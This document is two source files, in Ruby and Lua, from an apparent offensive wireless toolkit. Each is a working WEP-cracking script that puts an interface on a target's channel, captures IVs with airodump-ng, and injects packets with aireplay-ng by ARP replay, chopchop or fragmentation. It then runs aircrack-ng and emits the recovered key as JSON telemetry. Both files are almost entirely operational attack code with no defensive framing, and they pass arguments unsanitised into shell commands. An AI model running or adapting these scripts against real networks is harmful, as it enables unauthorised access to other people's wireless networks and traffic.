File: hackit/wireless/plugins/ruby/scripts/wep_attacker.rb
#!/usr/bin/env ruby
# frozen_string_literal: true

require 'json'
require 'time'
require 'open3'

begin
  iface = ARGV[0]
  bssid = ARGV[1]
  channel = (ARGV[2] || 1).to_i
  count = (ARGV[3] || 20_000).to_i
  method = (ARGV[4] || 'arp_replay').downcase

  raise 'interface required' unless iface
  raise 'bssid required' unless bssid

  stdout, stderr, status = Open3.capture3("iw dev #{iface} info 2>/dev/null")
  unless stdout.include?('type monitor')
    puts JSON.generate({ event: 'monitor_fail', iface: iface,
      data: { message: 'Interface not in monitor mode' },
      timestamp: Time.now.iso8601 })
    $stdout.flush
  end

  system("iw dev #{iface} set channel #{channel} 2>/dev/null")
  puts JSON.generate({ event: 'channel_set', iface: iface, bssid: bssid,
    data: { channel: channel }, timestamp: Time.now.iso8601 })
  $stdout.flush

  puts JSON.generate({ event: 'iv_collect_start', iface: iface, bssid: bssid,
    data: { method: 'airodump' }, timestamp: Time.now.iso8601 })
  $stdout.flush

  airodump_pid = spawn("airodump-ng -c #{channel} -w /tmp/wep_capture --bssid #{bssid} #{iface} 2>/dev/null")
  Process.detach(airodump_pid)

  6.times do |i|
    sleep(5)
    cap_file = '/tmp/wep_capture-01.cap'
    size = File.size(cap_file) if File.exist?(cap_file)
    puts JSON.generate({ event: 'iv_progress', iface: iface, bssid: bssid,
      data: { elapsed: (i + 1) * 5, file_size: size || 0 },
      timestamp: Time.now.iso8601 })
    $stdout.flush
  end

  system("pkill -f 'airodump-ng.*#{iface}' 2>/dev/null")
  sleep(1)

  puts JSON.generate({ event: 'method_start', iface: iface, bssid: bssid,
    data: { method: method }, timestamp: Time.now.iso8601 })
  $stdout.flush

  case method
  when 'chopchop'
    stdout, stderr, status = Open3.capture3("aireplay-ng -4 -b #{bssid} -h 00:11:22:33:44:55 #{iface} 2>/dev/null")
    stdout.each_line do |line|
      if (pct = line[/Progress: (\d+)/, 1])
        puts JSON.generate({ event: 'chopchop_progress', iface: iface, bssid: bssid,
          data: { percent: pct.to_i }, timestamp: Time.now.iso8601 })
        $stdout.flush
      end
      if line.include?('Keystream')
        puts JSON.generate({ event: 'keystream_found', iface: iface, bssid: bssid,
          data: { detail: line[0..150] }, timestamp: Time.now.iso8601 })
        $stdout.flush
      end
    end
  when 'fragmentation'
    stdout, stderr, status = Open3.capture3("aireplay-ng -5 -b #{bssid} -h 00:11:22:33:44:55 #{iface} 2>/dev/null")
    packets = 0
    stdout.each_line do |line|
      if line.include?('Fragment') || line.include?('packet')
        packets += 1
        puts JSON.generate({ event: 'frag_sent', iface: iface, bssid: bssid,
          data: { count: packets }, timestamp: Time.now.iso8601 })
        $stdout.flush
      end
    end
  else
    stdout, stderr, status = Open3.capture3("aireplay-ng -3 -b #{bssid} -h 00:11:22:33:44:55 #{iface} 2>/dev/null")
    packets = 0
    stdout.each_line do |line|
      if line.include?('ARP') || line.include?('packet')
        packets += 1
        puts JSON.generate({ event: 'arp_sent', iface: iface, bssid: bssid,
          data: { count: packets }, timestamp: Time.now.iso8601 })
        $stdout.flush
      end
    end
  end

  puts JSON.generate({ event: 'crack_start', iface: iface, bssid: bssid,
    data: { method: 'aircrack-ng' }, timestamp: Time.now.iso8601 })
  $stdout.flush

  stdout, stderr, status = Open3.capture3("aircrack-ng -b #{bssid} /tmp/wep_capture-01.cap 2>/dev/null")
  key = stdout[/KEY FOUND! \[ ([^\]]+) \]/, 1] || ''
  unless key.empty?
    puts JSON.generate({ event: 'key_found', iface: iface, bssid: bssid,
      data: { wep_key: key }, timestamp: Time.now.iso8601 })
    $stdout.flush
  end

  if stdout.include?('Failed')
    puts JSON.generate({ event: 'crack_failed', iface: iface, bssid: bssid,
      data: { message: 'Not enough IVs captured' },
      timestamp: Time.now.iso8601 })
    $stdout.flush
  end

  puts JSON.generate({ event: 'complete', iface: iface, bssid: bssid,
    data: { method: method, key_found: !key.empty?, captured_file: '/tmp/wep_capture-01.cap' },
    timestamp: Time.now.iso8601 })
  $stdout.flush

rescue Interrupt
  system("pkill -f 'airodump-ng.*#{iface}' 2>/dev/null") if iface
  system("pkill -f 'aireplay-ng.*#{iface}' 2>/dev/null") if iface
  puts JSON.generate({ event: 'wep_interrupted', iface: iface || '',
    data: { status: 'interrupted' }, timestamp: Time.now.iso8601 })
rescue => e
  $stderr.puts JSON.generate({ event: 'error', data: { message: e.message,
    backtrace: e.backtrace&.first }, timestamp: Time.now.iso8601 })
  exit 1
end

File: hackit/wireless/plugins/lua/scripts/wep_attacker.lua
#!/usr/bin/env lua

local iface = arg[1]
local bssid = arg[2]
local channel = tonumber(arg[3]) or 1
local count = tonumber(arg[4]) or 20000
local method = arg[5] or "arp_replay"

local function json_escape(s)
  return '"' .. tostring(s):gsub('\\', '\\\\'):gsub('"', '\\"'):gsub('\n', '\\n'):gsub('\r', '\\r') .. '"'
end

local function telemetry(event, data)
  local ts = tostring(os.time())
  io.write('{"event":' .. json_escape(event) .. ',"iface":' .. json_escape(iface) .. ',"bssid":' .. json_escape(bssid) .. ',"ssid":"","channel":' .. tostring(channel) .. ',"data":' .. data .. ',"timestamp":' .. json_escape(ts) .. '}\n')
  io.flush()
end

local function check_monitor_mode()
  local cmd = "iw dev " .. iface .. " info 2>/dev/null"
  local f = io.popen(cmd)
  if not f then return false end
  local out = f:read("*a")
  f:close()
  if out:find("type monitor") then
    telemetry("monitor_ok", '{"message":"Monitor mode confirmed"}')
    return true
  end
  telemetry("monitor_fail", '{"message":"Interface not in monitor mode"}')
  return false
end

local function set_channel()
  os.execute("iw dev " .. iface .. " set channel " .. tostring(channel) .. " 2>/dev/null")
  telemetry("channel_set", '{"channel":' .. tostring(channel) .. '}')
end

local function iv_collect()
  local cmd = "airodump-ng -c " .. tostring(channel) .. " -w /tmp/wep_capture --bssid " .. bssid .. " " .. iface .. " 2>/dev/null &"
  telemetry("iv_collect_start", '{"method":"airodump","cmd":' .. json_escape(cmd) .. '}')
  os.execute(cmd)
  local elapsed = 0
  while elapsed < 30 do
    os.execute("sleep 5")
    elapsed = elapsed + 5
    local f = io.open("/tmp/wep_capture-01.cap", "rb")
    if f then
      local size = f:seek("end")
      f:close()
      telemetry("iv_progress", '{"elapsed":' .. tostring(elapsed) .. ',"file_size":' .. tostring(size) .. '}')
    end
  end
  os.execute("pkill -f 'airodump-ng.*" .. iface .. "' 2>/dev/null")
  telemetry("iv_collect_done", '{"file":"/tmp/wep_capture-01.cap"}')
end

local function arp_replay()
  telemetry("method_start", '{"method":"arp_replay"}')
  local cmd = "aireplay-ng -3 -b " .. bssid .. " -h 00:11:22:33:44:55 " .. iface .. " 2>/dev/null &"
  telemetry("arp_replay_cmd", '{"cmd":' .. json_escape(cmd) .. '}')
  os.execute(cmd)
  local sent = 0
  local f = io.popen("aireplay-ng -3 -b " .. bssid .. " " .. iface .. " 2>/dev/null")
  if f then
    while true do
      local line = f:read("*l")
      if not line then break end
      if line:find("ARP") or line:find("packet") then
        sent = sent + 1
        telemetry("arp_sent", '{"count":' .. tostring(sent) .. '}')
      end
    end
    f:close()
  end
  telemetry("arp_replay_done", '{"packets_sent":' .. tostring(sent) .. '}')
  return sent > 0
end

local function chopchop()
  telemetry("method_start", '{"method":"chopchop"}')
  local cmd = "aireplay-ng -4 -b " .. bssid .. " -h 00:11:22:33:44:55 " .. iface .. " 2>/dev/null"
  telemetry("chopchop_cmd", '{"cmd":' .. json_escape(cmd) .. '}')
  local f = io.popen(cmd)
  if not f then return false end
  local progress = 0
  while true do
    local line = f:read("*l")
    if not line then break end
    local p = line:match("Progress: (%d+)")
    if p then
      progress = tonumber(p)
      telemetry("chopchop_progress", '{"percent":' .. tostring(progress) .. '}')
    end
    if line:find("Keystream") then
      telemetry("keystream_found", '{"data":' .. json_escape(line:sub(1, 150)) .. '}')
    end
  end
  f:close()
  telemetry("chopchop_done", '{"progress":' .. tostring(progress) .. '}')
  return progress > 50
end

local function fragmentation()
  telemetry("method_start", '{"method":"fragmentation"}')
  local cmd = "aireplay-ng -5 -b " .. bssid .. " -h 00:11:22:33:44:55 " .. iface .. " 2>/dev/null"
  telemetry("frag_cmd", '{"cmd":' .. json_escape(cmd) .. '}')
  local f = io.popen(cmd)
  if not f then return false end
  local packets = 0
  while true do
    local line = f:read("*l")
    if not line then break end
    if line:find("Fragment") or line:find("packet") then
      packets = packets + 1
      telemetry("frag_sent", '{"count":' .. tostring(packets) .. '}')
    end
  end
  f:close()
  telemetry("frag_done", '{"packets_generated":' .. tostring(packets) .. '}')
  return packets > 0
end

local function crack_wep()
  local cmd = "aircrack-ng -b " .. bssid .. " /tmp/wep_capture-01.cap 2>/dev/null"
  telemetry("crack_start", '{"cmd":' .. json_escape(cmd) .. '}')
  local f = io.popen(cmd)
  if not f then return end
  local key = ""
  while true do
    local line = f:read("*l")
    if not line then break end
    local k = line:match("KEY FOUND! %[ ([^]]+) %]")
    if k then
      key = k
      telemetry("key_found", '{"wep_key":' .. json_escape(key) .. '}')
    end
    if line:find("Failed") then
      telemetry("crack_failed", '{"message":"Not enough IVs captured"}')
    end
  end
  f:close()
  telemetry("crack_done", '{"key":' .. json_escape(key) .. '}')
  return key ~= ""
end

if arg[1] == "--help" then
  print("Usage: wep_attacker.lua <interface> <bssid> [channel] [count] [method]")
  print("WEP cracking: arp_replay, chopchop, fragmentation")
  print("Example: wep_attacker.lua wlan0 00:11:22:33:44:55 6 50000 arp_replay")
  os.exit(0)
end

if not iface or not bssid then
  telemetry("error", '{"error":"Usage: wep_attacker.lua <interface> <bssid> [channel] [count] [method]"}')
  os.exit(1)
end

if not check_monitor_mode() then
  telemetry("error", '{"error":"Monitor mode required on ' .. iface .. '"}')
  os.exit(1)
end

set_channel()
iv_collect()

if method == "chopchop" then
  chopchop()
elseif method == "fragmentation" then
  fragmentation()
else
  arp_replay()
end

crack_wep()

telemetry("complete", '{"method":' .. json_escape(method) .. '}')
